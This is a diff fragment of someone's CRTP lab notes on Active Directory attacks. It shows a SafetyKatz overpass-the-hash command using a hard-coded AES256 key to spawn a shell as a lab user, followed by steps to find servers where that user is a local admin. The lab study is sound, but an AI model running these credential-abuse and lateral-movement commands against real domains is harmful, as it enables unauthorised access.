italianpenty/appunti/LAB/CRTP no C2.md

 C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit"
 ```
 One we are logged in we can launch invishell.
-Import the Find-PSRemotingLocalAdminAccess.ps1 module to see where the server can log in
+Import the Find-PSRemotingLocalAdminAccess.ps1 module to see if we can log in the server

 ```powershell
 .
 C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1